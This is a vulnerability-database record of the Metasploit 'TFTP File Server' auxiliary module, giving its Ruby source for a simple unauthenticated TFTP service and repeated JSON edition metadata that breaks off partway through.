ID MSF:AUXILIARY/SERVER/TFTP Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module provides a TFTP service
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/tftp'
require 'tmpdir'
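class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::TFTPServer
  include Msf::Auxiliary::Report

  # Registers module metadata and the listener / directory options.
  #
  # TFTP carries no authentication: anything under TFTPROOT is readable by
  # every host that can reach SRVHOST:SRVPORT, and uploads land in
  # OUTPUTPATH. Both directories default to the system temp directory
  # (Dir.tmpdir) and SRVHOST defaults to all interfaces, so operators should
  # point the paths at dedicated, otherwise-empty directories and bind only
  # the interface that is actually needed.
  def initialize
    super(
      'Name'        => 'TFTP File Server',
      'Description' => %q{
        This module provides a TFTP service
      },
      'Author'      => [ 'jduck', 'todb' ],
      'License'     => MSF_LICENSE,
      'Actions'     =>
        [
          [ 'Service' ]
        ],
      'PassiveActions' =>
        [
          'Service'
        ],
      'DefaultAction' => 'Service'
    )

    register_options(
      [
        OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]),
        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 69 ]),
        OptPath.new('TFTPROOT', [ true, "The TFTP root directory to serve files from", Dir.tmpdir ]),
        OptPath.new('OUTPUTPATH', [ true, "The directory in which uploaded files will be written.", Dir.tmpdir ])
      ])
  end

  # @return [String] address to bind, falling back to all interfaces when unset
  def srvhost
    datastore['SRVHOST'] || '0.0.0.0'
  end

  # @return [Integer] UDP port to bind, falling back to the TFTP default
  def srvport
    datastore['SRVPORT'] || 69
  end

  # Creates the Rex TFTP server, serves until its thread exits, then stops it.
  #
  # The stop call sits in an +ensure+ so the listener is torn down even when
  # the thread running this method is killed (job kill / interrupt) instead of
  # only on the path where the server thread ends by itself.
  def run
    print_status("Starting TFTP server on #{srvhost}:#{srvport}...")

    @tftp = Rex::Proto::TFTP::Server.new(
      srvport,
      srvhost,
      {}
    )

    @tftp.set_tftproot(datastore['TFTPROOT'])
    print_status("Files will be served from #{datastore['TFTPROOT']}")

    @tftp.set_output_dir(datastore['OUTPUTPATH'])
    print_status("Uploaded files will be saved in #{datastore['OUTPUTPATH']}")

    # Individual virtual files can be served here -
    #@tftp.register_file("ays", "A" * 2048) # multiple of 512 on purpose

    @tftp.start
    add_socket(@tftp.sock)

    begin
      # Wait for finish..
      sleep 3 while @tftp.thread.alive?
    ensure
      vprint_status("Stopping TFTP server")
      @tftp.stop
    end
  end
end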
{"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-30T14:36:53", "history": [{"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/server/tftp", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-02T23:27:11", "history": [], "viewCount": 2, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir 
]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\n\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-07-02T23:27:11", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/server/tftp", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-24T19:25:36", "history": [], "viewCount": 3, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-07-24T19:25:36", "differentElements": ["href"], "edition": 2}, {"bulletin": {"id": 
"MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:07", "history": [], "viewCount": 3, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n 
@tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-08-21T15:32:07", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-19T15:43:52", "history": [], "viewCount": 3, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen 
on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-10-19T15:43:52", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-19T23:45:32", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-10-19T23:45:32"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": 
"https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-10-19T23:45:32", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T02:03:00", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-12-26T02:03:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def 
run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T02:03:00", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T04:03:34", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-12-26T04:03:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 
'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T04:03:34", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": 
{"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T06:08:04", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-12-26T06:08:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n 
#@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T06:08:04", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T22:04:38", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP 
root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T22:04:38", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-22T05:33:28", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n 